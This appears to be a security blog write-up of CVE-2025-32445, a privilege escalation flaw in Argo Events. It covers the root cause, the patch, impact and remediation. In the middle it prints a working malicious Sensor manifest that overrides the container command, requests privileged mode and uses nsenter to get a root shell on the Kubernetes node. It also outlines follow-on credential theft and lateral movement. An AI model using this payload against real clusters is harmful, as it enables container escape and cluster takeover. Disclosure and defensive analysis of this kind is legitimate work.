Feb 24, 2026·6 min read·10 visits
Argo Events let users define too much in their Custom Resources. An attacker with permission to create a 'Sensor' can override the container command, enable 'privileged' mode, and mount the host filesystem. This grants root access to the underlying node, bypassing all cluster RBAC.
A critical privilege escalation vulnerability in Argo Events allows low-privileged users to hijack the pod specifications of EventSources and Sensors. By manipulating the 'template' field, attackers can inject arbitrary commands and security contexts, effectively turning a standard automation workflow into a privileged root shell on the Kubernetes node.
Argo Events is the Rube Goldberg machine of the Kubernetes world. It's the glue that says, 'When a file drops in S3, spin up a workflow.' It relies on two main components: EventSources (the ears) and Sensors (the hands). To do their job, these components often need to spawn pods—little worker bees that listen for signals or trigger actions.
Here is where the philosophy of 'Configuration as Code' runs headfirst into a brick wall of security reality. The developers wanted flexibility. They wanted users to be able to define exactly how these worker pods should look. Maybe you need a specific environment variable, or you need to tweak the memory limit. That sounds reasonable, right?
But in the world of exploits, flexibility is just another word for 'attack surface.' The vulnerability we are looking at today, CVE-2025-32445, is a classic case of a developer trusting the user too much. They handed over the keys to the pod specification, not realizing that the user wouldn't just adjust the AC—they'd replace the engine with a pipe bomb.
The root cause here is a tale as old as Go programming itself: Struct Reuse. When defining the Custom Resource Definitions (CRDs) for EventSource and Sensor, the Argo team needed a way to describe the container that would eventually run. Instead of defining a safe, limited subset of fields, they imported the heavy artillery: the standard Kubernetes io.k8s.api.core.v1.Container struct.
This struct is the kitchen sink. It contains everything a pod can possibly do. It includes image, resources, and ports. But it also includes command (the entrypoint), args (the arguments), securityContext (where the privileged flag lives), and volumeMounts.
When the Argo Events controller reconciles your Sensor, it takes your YAML and merges it into the pod it's about to create. Because the code didn't sanitize this input, it blindly accepts your overrides. If you tell the controller, 'Hey, run this Sensor, but instead of the Argo binary, run /bin/sh and give me root capabilities,' the controller happily obliges. It creates a pod running as the controller's service account (or the specified user), but with your execution logic.
Let's look at the fix to understand the break. The patch, authored in commit 18412293a699f559848b00e6e459c9ce2de0d3e2, explicitly rips out the standard Kubernetes container definition and replaces it with a sanitized, local version.
Before (The Vulnerable Logic): The code likely used a direct embedding or reference to the K8s Core V1 Container. This meant the Go struct had JSON tags mapping to every dangerous field available in the Kubernetes API.
After (The Fix):
The developers introduced a new type, io.argoproj.events.v1alpha1.Container. Crucially, notice what is missing:
// New restricted container struct
type Container struct {
// Image is removed or strictly controlled
// Command and Args are GONE
Env []corev1.EnvVar `json:"env,omitempty" protobuf:"bytes,7,rep,name=env"`
Resources corev1.ResourceRequirements `json:"resources,omitempty" protobuf:"bytes,8,opt,name=resources"`
VolumeMounts []corev1.VolumeMount `json:"volumeMounts,omitempty" protobuf:"bytes,9,rep,name=volumeMounts"`
SecurityContext *corev1.SecurityContext `json:"securityContext,omitempty" protobuf:"bytes,15,opt,name=securityContext"`
// ...
}Wait, did you catch that? SecurityContext and VolumeMounts are actually still there in the struct definition in some contexts, but the validation logic and the removal of command/args neuter the attack. By removing command and args from the accepted schema, an attacker can no longer change what the program runs. Even if they mount the host filesystem, they are stuck running the Argo binary, which (hopefully) doesn't have a feature to 'cat /etc/shadow'.
The most critical change is that the API server will now reject CRs containing the command field because it no longer exists in the OpenAPI schema definition for the CRD.
Let's assume you are a developer with restricted access. You can't create Pods directly (because your admin isn't stupid), but you can create Argo Sensors to manage your workflows. That is all we need.
We are going to craft a Sensor that hijacks the pod template. We will overwrite the command to spawn a reverse shell, but to make it juicy, we will also ask for privileged: true. This allows us to access the host's devices.
The Payload:
apiVersion: argoproj.io/v1alpha1
kind: Sensor
metadata:
name: trojan-sensor
spec:
template:
serviceAccountName: default
container:
# The Override
image: python:3.9-alpine
command: ["/bin/sh"]
args: ["-c", "nsenter -t 1 -m -u -n -i -- sh"]
securityContext:
privileged: trueThe Execution Chain:
spec.template. It doesn't validate the command. It generates a Pod manifest merging our malicious config.privileged: true is set, the container runtime disables security isolation.nsenter command in our args allows us to break out of the container namespace and enter the host's PID 1 namespace. We are now effectively root on the Kubernetes node.From here, it's game over. We can grab the kubelet credentials, talk to the API server, or dump secrets from other pods running on the same node.
The CVSS score is 9.9 for a reason. This is not a Denial of Service. This is a complete compromise of the compute node. In a Kubernetes environment, the security boundary is usually the Namespace. This vulnerability shatters that boundary.
If you are running a multi-tenant cluster where Team A shouldn't see Team B's data, this bug destroys that guarantee. An attacker in Team A uses this exploit to become Node Root. Once they are Node Root, they can inspect the memory and disk of any container running on that node—including Team B's database or the cluster's ingress controller.
Furthermore, if the node has high-privilege Service Accounts mounted (like a CI/CD runner or a monitoring agent), the attacker can steal those tokens and pivot laterally to compromise the entire cluster control plane. This is a 'Cluster Admin via Lateral Movement' vector.
The remediation is straightforward: Update to Argo Events v1.9.6. The patch restricts the CRD schema, meaning the Kubernetes API server will physically reject any YAML that tries to slip in a command or args field. It's a hard schema validation failure.
Defensive In-Depth:
If you cannot patch immediately, or if you just want to sleep better at night, you should be using Admission Controllers like Kyverno or OPA Gatekeeper. You should have a policy that strictly forbids the creation of Sensors or EventSources that contain securityContext.privileged: true or hostPath mounts.
> [!NOTE] > Relying on the application to validate input is always a secondary control. The primary control should be the Kubernetes Admission layer, which can catch these bad configurations regardless of which buggy controller tries to create them.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
Argo Events Argo Project | < 1.9.6 | 1.9.6 |
| Attribute | Detail |
|---|---|
| Attack Vector | Network (via K8s API) |
| CVSS v3.1 | 9.9 (Critical) |
| Privileges Required | Low (Create/Edit Sensor CRs) |
| Impact | Cluster Node Compromise / Container Escape |
| CWE | CWE-250: Execution with Unnecessary Privileges |
| Exploit Status | PoC Available / High Likelihood |
The product performs an operation at a privilege level that is higher than the minimum level required, which creates new security weaknesses.